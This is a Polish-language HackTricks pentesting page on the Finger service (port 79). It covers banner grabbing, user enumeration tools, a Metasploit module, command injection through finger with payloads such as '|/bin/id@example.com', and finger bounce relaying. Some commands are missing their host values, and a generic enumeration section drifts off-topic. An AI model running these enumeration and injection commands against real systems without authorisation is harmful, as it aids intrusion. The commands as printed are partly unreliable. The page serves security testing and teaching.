# 79 - Testowanie penetracyjne Finger
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)! Inne sposoby wsparcia HackTricks: * Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)! * Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com) * Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family) * **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## **Podstawowe informacje** Program/usługa **Finger** służy do pobierania informacji o użytkownikach komputera. Zazwyczaj dostarczane informacje obejmują **nazwę użytkownika, pełne imię** i w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe szczegóły mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas logowania użytkownika, okres bezczynności (czas bezczynności), ostatnią chwilę odczytu poczty przez użytkownika oraz zawartość plików planu i projektu użytkownika. **Domyślny port:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Egzaminacja** ### **Pobieranie baneru/Podstawowe połączenie** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Wyszukiwanie użytkowników** Wyszukiwanie użytkowników to proces identyfikowania i zbierania informacji o użytkownikach w celu uzyskania dostępu do systemu. Poniżej przedstawiam kilka technik, które można wykorzystać do przeprowadzenia takiego procesu. #### **1. Finger** Finger to protokół, który umożliwia uzyskanie informacji o użytkownikach z serwera. Można go wykorzystać do wyszukiwania użytkowników na zdalnym systemie. Aby użyć protokołu Finger, wystarczy wysłać zapytanie do serwera, podając nazwę użytkownika. Serwer odpowie, udostępniając informacje o użytkowniku, takie jak nazwa, opis, adres e-mail itp. Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu Finger, można użyć narzędzi takich jak `finger` lub `finger-user-enum`. Przykład użycia narzędzia `finger-user-enum`: ``` finger-user-enum.pl -U /path/to/usernames.txt -t ``` Gdzie `/path/to/usernames.txt` to ścieżka do pliku zawierającego listę nazw użytkowników, a `` to adres IP lub nazwa domenowa zdalnego systemu. #### **2. LDAP** LDAP (Lightweight Directory Access Protocol) to protokół używany do zarządzania i dostępu do katalogów. Można go wykorzystać do wyszukiwania użytkowników w katalogach LDAP. Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu LDAP, można użyć narzędzi takich jak `ldapsearch`. Przykład użycia narzędzia `ldapsearch`: ``` ldapsearch -x -h -b "dc=,dc=" "(objectClass=user)" ``` Gdzie `` to adres IP lub nazwa domenowa serwera LDAP, a `` i `` to odpowiednie wartości domeny. #### **3. DNS** DNS (Domain Name System) to system, który przypisuje nazwy domenowe do adresów IP. Można wykorzystać DNS do wyszukiwania użytkowników, sprawdzając, czy istnieją rekordy DNS dla określonych nazw użytkowników. Aby przeprowadzić wyszukiwanie użytkowników za pomocą DNS, można użyć narzędzi takich jak `dnsenum`. Przykład użycia narzędzia `dnsenum`: ``` dnsenum --enum -f /path/to/usernames.txt ``` Gdzie `/path/to/usernames.txt` to ścieżka do pliku zawierającego listę nazw użytkowników, a `` to adres IP lub nazwa domenowa systemu. #### **4. Social Engineering** Inżynieria społeczna to technika polegająca na manipulowaniu ludźmi w celu uzyskania poufnych informacji. Można wykorzystać inżynierię społeczną do uzyskania informacji o użytkownikach, takich jak nazwy użytkowników, adresy e-mail, numery telefonów itp. Przykłady technik inżynierii społecznej to phishing, pretexting, tailgating itp. Wyszukiwanie użytkowników jest ważnym krokiem w procesie penetrowania systemów. Dzięki odpowiednim narzędziom i technikom można zidentyfikować użytkowników i wykorzystać te informacje do dalszych działań. ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternatywnie można użyć **finger-user-enum** z [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), kilka przykładów: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap wykonuje skrypt do wykonania za pomocą domyślnych skryptów** ### Metasploit używa więcej trików niż Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## Wykonanie polecenia ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Wykorzystaj system jako przekaźnik dla finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)! Inne sposoby wsparcia HackTricks: * Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)! * Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com) * Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family) * **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.